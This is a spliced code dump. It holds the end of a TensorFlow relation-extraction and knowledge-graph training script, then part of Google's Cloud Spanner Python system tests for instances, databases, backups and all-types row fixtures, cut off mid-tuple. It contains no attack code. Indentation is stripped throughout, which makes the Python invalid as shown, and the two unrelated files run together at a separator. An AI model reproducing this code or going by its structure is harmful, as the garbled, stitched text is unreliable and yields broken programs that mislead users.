word_embeddings, relation_embeddings, position_embeddings, relation_attention, attention, W, B, transfer_w = sess.run([m.word_embeddings, m.relation_embeddings, m.position_embeddings, m.relation_attention, m.attention, m.W, m.b, m.transfer_w])
log = open("log"+str1+".txt", "w")
log.write(json.dumps(word_embeddings.tolist())+"\n")
log.write(json.dumps(relation_embeddings.tolist())+"\n")
log.write(json.dumps(position_embeddings.tolist())+"\n")
log.write(json.dumps(relation_attention.tolist())+"\n")
log.write(json.dumps(attention.tolist())+"\n")
log.write(json.dumps(W.tolist())+"\n")
log.write(json.dumps(B.tolist())+"\n")
log.write(json.dumps(transfer_w.tolist())+"\n")
NAattention = sess.run(m.NAattention)
log.write(json.dumps(NAattention.tolist()) + "\n")
ent_transfer = sess.run(m.ent_transfer)
log.write(json.dumps(ent_transfer.tolist()) + "\n")
rel_transfer = sess.run(m.rel_transfer)
log.write(json.dumps(rel_transfer.tolist()) + "\n")
log.close()
x_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
p_t_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
p_h_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
r_batch = np.zeros((1, 1), dtype = np.int32)
y_batch = np.zeros((1, config.num_classes), dtype = np.int32)
r_n_batch = np.zeros((1, 1), dtype = np.float32)
h_batch = np.zeros((1, 1), dtype = np.int32)
t_batch = np.zeros((1, 1), dtype = np.int32)
x_batch_addr = x_batch.__array_interface__['data'][0]
p_t_batch_addr = p_t_batch.__array_interface__['data'][0]
p_h_batch_addr = p_h_batch.__array_interface__['data'][0]
y_batch_addr = y_batch.__array_interface__['data'][0]
r_batch_addr = r_batch.__array_interface__['data'][0]
r_n_batch_addr = r_n_batch.__array_interface__['data'][0]
h_batch_addr = h_batch.__array_interface__['data'][0]
t_batch_addr = t_batch.__array_interface__['data'][0]
lib_cnn.batch_iter.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p]
tipTotal = lib_cnn.getTipTotal()
loop = 0
def train_cnn(coord):
def train_step_cnn(x_batch, p_h_batch, p_t_batch, y_batch, r_batch, r_n_batch, h_batch, t_batch):
global bags_sum, bags_hit, loss_sum, bags_hit_NA, sum_fNA, sum_NA
feed_dict = {
m.input_x: x_batch,
m.input_p_h: p_h_batch,
m.input_p_t: p_t_batch,
m.input_r: r_batch,
m.input_r_n: r_n_batch,
m.input_y: y_batch,
m.input_h: h_batch,
m.input_t: t_batch
}
_, step, loss, accuracy = sess.run(
[train_op_cnn, global_step_cnn, m.loss_cnn, m.accuracy], feed_dict)
time_str = datetime.datetime.now().isoformat()
loss_sum += loss
bags_sum += 1
if (r_batch[0]!=config.NA):
sum_fNA += 1
if accuracy > 0.5:
bags_hit += 1.0
else:
sum_NA += 1
if accuracy > 0.5:
bags_hit_NA += 1.0
if bags_sum % 1000 == 0:
if (sum_NA == 0):
sum_NA+=1
if (sum_fNA == 0):
sum_fNA+=1
print("{}: step {}, loss {:g}, acc {:g} acc {:g} {} {}".format(time_str, step, loss_sum/bags_sum, bags_hit_NA/sum_NA, bags_hit/sum_fNA, sum_NA, sum_fNA))
global loop
while not coord.should_stop():
print 'Looping ', loop
outEmbedding(str(loop))
for i in range(tipTotal):
length = lib_cnn.batch_iter(x_batch_addr, p_h_batch_addr, p_t_batch_addr, y_batch_addr, r_batch_addr, r_n_batch_addr, h_batch_addr, t_batch_addr)
train_step_cnn(x_batch[0:length,], p_h_batch[0:length,], p_t_batch[0:length,], y_batch, r_batch, r_n_batch, h_batch, t_batch)
global bags_sum, bags_hit, loss_sum, bags_hit_NA, sum_fNA, sum_NA
bags_sum = 0
bags_hit = 0
bags_hit_NA = 0
loss_sum = 0
sum_fNA = 0
sum_NA = 0
loop += 1
if loop == config.trainTimes:
coord.request_stop()
ph = np.zeros(config.batch_size, dtype = np.int32)
pt = np.zeros(config.batch_size, dtype = np.int32)
pr = np.zeros(config.batch_size, dtype = np.int32)
nh = np.zeros(config.batch_size, dtype = np.int32)
nt = np.zeros(config.batch_size, dtype = np.int32)
nr = np.zeros(config.batch_size, dtype = np.int32)
ph_addr = ph.__array_interface__['data'][0]
pt_addr = pt.__array_interface__['data'][0]
pr_addr = pr.__array_interface__['data'][0]
nh_addr = nh.__array_interface__['data'][0]
nt_addr = nt.__array_interface__['data'][0]
nr_addr = nr.__array_interface__['data'][0]
lib_kg.getBatch.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int]
times_kg = 0
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
m.pos_h: pos_h_batch,
m.pos_t: pos_t_batch,
m.pos_r: pos_r_batch,
m.neg_h: neg_h_batch,
m.neg_t: neg_t_batch,
m.neg_r: neg_r_batch
}
_, step, loss, = sess.run(
[train_op_kg, global_step_kg, m.loss_kg], feed_dict)
return loss
global times_kg
while not coord.should_stop():
times_kg += 1
res = 0.0
for batch in range(config.nbatches):
lib_kg.getBatch(ph_addr, pt_addr, pr_addr, nh_addr, nt_addr, nr_addr, config.batch_size)
res += train_step_kg(ph, pt, pr, nh, nt, nr)
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_cnn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
|
test_system.py
|
# Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance object and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance object and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(30) # raises on failure / timeout.
op2.result(30) # raises on failure / timeout.
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(30)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(30)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
        self.assertEqual(self._db.name, backup.database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
        invalid_expire_time = datetime.utcnow() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
        if self._diff_config_instance is None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(30)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time_1
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
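# Sample values for the ``all_types`` table: dates, timestamps with nanosecond
# precision, non-finite floats, a NaN decoded from raw bytes, byte strings,
# and NUMERIC decimals used by the datatype round-trip tests below.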
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for column in ALL_TYPES_COLUMNS])
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
    [None for column in EMULATOR_ALL_TYPES_COLUMNS]
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
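# The emulator schema omits the NUMERIC columns, so the emulator variants of
# the row data leave out the numeric value and numeric array entries.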
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
